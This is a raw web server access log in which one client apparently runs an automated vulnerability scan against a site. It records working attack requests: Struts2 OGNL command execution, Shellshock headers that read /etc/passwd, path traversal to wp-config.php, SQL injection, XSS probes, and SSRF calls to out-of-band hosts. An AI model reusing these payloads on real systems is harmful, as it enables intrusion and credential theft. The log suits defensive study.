16:53:13 103.153.214.94 GET /secureader/javax.faces.resource/web.xml loc=../WEB-INF 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 366 2023-11-09 16:53:13 103.153.214.94 GET /api/v1/repos/search q=%27)%09UNION%09SELECT%09*%09FROM%09(SELECT%09null)%09AS%09a1%09%09JOIN%09(SELECT%091)%09as%09u%09JOIN%09(SELECT%09user())%09AS%09b1%09JOIN%09(SELECT%09user())%09AS%09b2%09JOIN%09(SELECT%09null)%09as%09a3%09%09JOIN%09(SELECT%09null)%09as%09a4%09%09JOIN%09(SELECT%09null)%09as%09a5%09%09JOIN%09(SELECT%09null)%09as%09a6%09%09JOIN%09(SELECT%09null)%09as%09a7%09%09JOIN%09(SELECT%09null)%09as%09a8%09%09JOIN%09(SELECT%09null)%09as%09a9%09JOIN%09(SELECT%09null)%09as%09a10%09JOIN%09(SELECT%09null)%09as%09a11%09JOIN%09(SELECT%09null)%09as%09a12%09JOIN%09(SELECT%09null)%09as%09a13%09%09JOIN%09(SELECT%09null)%09as%09a14%09%09JOIN%09(SELECT%09null)%09as%09a15%09%09JOIN%09(SELECT%09null)%09as%09a16%09%09JOIN%09(SELECT%09null)%09as%09a17%09%09JOIN%09(SELECT%09null)%09as%09a18%09%09JOIN%09(SELECT%09null)%09as%09a19%09%09JOIN%09(SELECT%09null)%09as%09a20%09%09JOIN%09(SELECT%09null)%09as%09a21%09%09JOIN%09(SELECT%09null)%09as%09a22%09where%09(%27%25%27=%27 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 0 2 2388 2023-11-09 16:53:15 103.153.214.94 GET /secureader/javax.faces.resource./WEB-INF/web.xml.jsf ln=.. 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 375 2023-11-09 16:53:17 103.153.214.94 GET /myaccount/javax.faces.resource/web.xml loc=../WEB-INF 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 363 2023-11-09 16:53:19 103.153.214.94 GET /wp-content/plugins/dzs-videogallery/deploy/designer/preview.php swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 371 2023-11-09 16:53:19 103.153.214.94 GET /myaccount/javax.faces.resource./WEB-INF/web.xml.jsf ln=.. 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 200 0 0 374 2023-11-09 16:53:21 103.153.214.94 GET /SupportPortlet/faces/javax.faces.resource/web.xml loc=../WEB-INF 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 393 2023-11-09 16:53:23 103.153.214.94 GET /SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf ln=.. 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 361 2023-11-09 16:53:45 103.153.214.94 GET /wp-content/plugins/dukapress/lib/dp_image.php src=../../../../wp-config.php 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 374 2023-11-09 16:54:16 103.153.214.94 GET /go.php http://interact.sh 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 398 2023-11-09 16:54:31 103.153.214.94 GET / page_id=0&&errors[fu-disallowed-mime-type][0][name]=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 1120 2023-11-09 16:54:58 103.153.214.94 GET /wp-content/plugins/db-backup/download.php file=../../../wp-config.php 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 200 0 0 361 2023-11-09 16:55:05 103.153.214.94 GET /webadmin/policy/category_table_ajax.php customctid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 367 2023-11-09 16:55:38 103.153.214.94 GET /remotereporter/load_logfiles.php server=018192&url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 392 2023-11-09 16:55:44 103.153.214.94 GET /webadmin/policy/group_table_ajax.php/</script><script>alert(document.domain)</script> - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 370 2023-11-09 16:56:12 103.153.214.94 GET /webadmin/reporter/view_server_log.php act=stats&filename=log&offset=1&count=1&sortorder=0&filter=0&log=../../../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 360 2023-11-09 16:56:22 103.153.214.94 POST /webadmin/auth/verification.php - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 https://bcvt.kontum.gov.vn/webadmin/start/ 405 0 1 375 2023-11-09 16:56:41 103.153.214.94 GET /webadmin/deny/index.php dpid=1&dpruleid=1&cat=1&ttl=5018400&groupname=<group_name_eg_netsweeper_student_allow_internet_access&policyname=auto_created&username=root&userip=127.0.0.1&connectionip=127.0.0.1&nsphostname=netsweeper&url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 372 2023-11-09 16:56:44 103.153.214.94 GET /index.action redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 371 2023-11-09 16:56:46 103.153.214.94 GET /login.action redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 200 0 0 372 2023-11-09 16:56:51 103.153.214.94 GET /index.action redirect%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 360 2023-11-09 16:56:53 103.153.214.94 GET /index.action action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 362 2023-11-09 16:56:55 103.153.214.94 GET /login.action action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 200 0 0 368 2023-11-09 16:56:57 103.153.214.94 GET /index.action action%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 375 2023-11-09 16:56:59 103.153.214.94 GET /index.action redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 371 2023-11-09 16:57:01 103.153.214.94 GET /login.action redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} 443 - 101.35.195.134 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 357 2023-11-09 16:57:03 103.153.214.94 GET /index.action redirectAction%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 374 2023-11-09 16:57:08 103.153.214.94 GET /remotereporter/load_logfiles.php server=127.0.0.1&url=https://interact.sh/ 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 200 0 0 392 2023-11-09 16:57:30 103.153.214.94 GET /webadmin/clientlogin/ srid&action=showdeny&url 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 364 2023-11-09 16:58:04 103.153.214.94 GET /wlsecurity.html - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 200 0 0 365 2023-11-09 16:59:27 103.153.214.94 GET /wp-content/plugins/candidate-application-form/downloadpdffile.php fileName=../../../../../../../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 200 0 0 382 2023-11-09 17:00:37 103.153.214.94 GET /wp-content/plugins/simple-image-manipulator/controller/download.php filepath=/etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 1963 2023-11-09 17:00:56 103.153.214.94 GET /wp-content/plugins/mypixs/mypixs/downloadpage.php url=/etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 200 0 0 365 2023-11-09 17:01:59 103.153.214.94 GET /remote/login err=--%3E%3Cscript%3Ealert('2XwZKhTVhnMs4EcWJ4kZgyurS0L')%3C/script%3E%3C!--&lang=en 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 367 2023-11-09 17:03:17 103.153.214.94 GET /dompdf.php input_file=php://filter/resource=/etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 434 2023-11-09 17:03:19 103.153.214.94 GET /magmi/web/magmi.php configstep=2&profile=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 383 2023-11-09 17:03:20 103.153.214.94 GET /PhpSpreadsheet/Writer/PDF/DomPDF.php input_file=php://filter/resource=/etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 384 2023-11-09 17:03:23 103.153.214.94 GET /lib/dompdf/dompdf.php input_file=php://filter/resource=/etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 359 2023-11-09 17:03:29 103.153.214.94 GET /includes/dompdf/dompdf.php input_file=php://filter/resource=/etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 375 2023-11-09 17:03:30 103.153.214.94 POST / - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 \x00 405 0 1 365 2023-11-09 17:03:32 103.153.214.94 GET /wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php input_file=php://filter/resource=/etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 200 0 0 1023 2023-11-09 17:03:34 103.153.214.94 GET /wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php input_file=php://filter/resource=/etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 398 2023-11-09 17:03:37 103.153.214.94 GET /wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php input_file=php://filter/resource=/etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 200 0 0 404 2023-11-09 17:03:40 103.153.214.94 GET /wp-content/plugins/post-pdf-export/dompdf/dompdf.php input_file=php://filter/resource=/etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 359 2023-11-09 17:03:42 103.153.214.94 POST /website/blog/ - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 405 0 1 361 2023-11-09 17:03:42 103.153.214.94 GET /magmi/web/ajax_pluginconf.php file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 200 0 0 358 2023-11-09 17:03:44 103.153.214.94 POST /_search - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 405 0 1 362 2023-11-09 17:03:44 103.153.214.94 GET /wp-content/plugins/blogtopdf/dompdf/dompdf.php input_file=php://filter/resource=/etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 358 2023-11-09 17:03:47 103.153.214.94 GET /wp-content/plugins/gboutique/library/dompdf/dompdf.php input_file=php://filter/resource=/etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 376 2023-11-09 17:03:50 103.153.214.94 GET /wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php input_file=php://filter/resource=/etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 200 0 0 361 2023-11-09 17:04:10 103.153.214.94 GET /wp-admin/tools.php content=attachment&wp-attachment-export-download=true 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 362 2023-11-09 17:04:13 103.153.214.94 GET /wp-admin/tools.php content&wp-attachment-export-download=true 443 - 101.35.195.134 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 365 2023-11-09 17:04:18 103.153.214.94 GET /webmail/old/calendar/minimizer/index.php script=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 364 2023-11-09 17:04:21 103.153.214.94 GET /webmail/old/calendar/minimizer/index.php style=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 200 0 0 360 2023-11-09 17:04:33 103.153.214.94 GET /wp-admin/admin-ajax.php action=ays_sccp_results_export_file&sccp_id[]=1)+AND+(SELECT+1183+FROM+(SELECT(SLEEP(6)))UPad)+AND+(9752=9752&type=json 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 370 2023-11-09 17:04:42 103.153.214.94 GET /wp-content/plugins/navis-documentcloud/js/window.php wpbase=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 200 0 0 1864 2023-11-09 17:05:10 103.153.214.94 GET /wp-admin/admin-ajax.php action=revslider_show_image&img=../wp-config.php 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 385 2023-11-09 17:05:14 103.153.214.94 GET /blog/wp-admin/admin-ajax.php action=revslider_show_image&img=../wp-config.php 443 - 101.35.195.134 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 200 0 0 1108 2023-11-09 17:05:53 103.153.214.94 GET /2XwZLHDNeumhu5xBrpFZRfltih8 - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 397 2023-11-09 17:06:35 103.153.214.94 GET /inc/supportLoad.asp urlToLoad=http://oast.me 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 200 0 0 388 2023-11-09 17:06:38 103.153.214.94 GET /vsaPres/Web20/core/LocalProxy.ashx url=http://oast.me 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 200 0 0 369 2023-11-09 17:08:05 103.153.214.94 GET /pages/setup.php defaultlanguage=..%2f..%2f..%2f..%2f..%2fetc%2fpasswd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 200 0 0 361 2023-11-09 17:08:14 103.153.214.94 GET /sysaid/getGfiUpgradeFile fileName=../../../../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 200 0 0 358 2023-11-09 17:08:18 103.153.214.94 GET /getGfiUpgradeFile fileName=../../../../../../../etc/passwd 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 200 0 0 361 2023-11-09 17:09:06 103.153.214.94 GET /_fragment _path=_controller=phpcredits&flag=-1 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 200 0 0 364 2023-11-09 17:09:36 103.153.214.94 GET / - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 ()+{+ignored;+};+echo+Content-Type:+text/html;+echo+;+/bin/cat+/etc/passwd 200 0 0 383 2023-11-09 17:09:38 103.153.214.94 GET /cgi-bin/status - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 ()+{+ignored;+};+echo+Content-Type:+text/html;+echo+;+/bin/cat+/etc/passwd 200 0 0 369 2023-11-09 17:09:42 103.153.214.94 GET /cgi-bin/stats - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 ()+{+ignored;+};+echo+Content-Type:+text/html;+echo+;+/bin/cat+/etc/passwd 200 0 0 370 2023-11-09 17:09:47 103.153.214.94 GET /cgi-bin/test - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 ()+{+ignored;+};+echo+Content-Type:+text/html;+echo+;+/bin/cat+/etc/passwd 200 0 0 364 2023-11-09 17:09:52 103.153.214.94 GET /cgi-bin/status/status.cgi - 443 - 101.35.195.134 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 ()+{+ignored;+};+echo+Content-Type:+text/html;+echo+;+/bin/cat+/etc/passwd 200 0 0 367 2023-11-09 17:09:55 103.153.214.94 GET /test.cgi - 443 - 101.35.195.134 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F ()+{+ignored;+};+echo+Content-Type:+text/html;+echo+;+/bin/cat+/etc/passwd 200 0 0 359 2023-11-09 17:09:58 103.153.214.94 GET /debug.cgi - 443 - 101.35.195.134 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 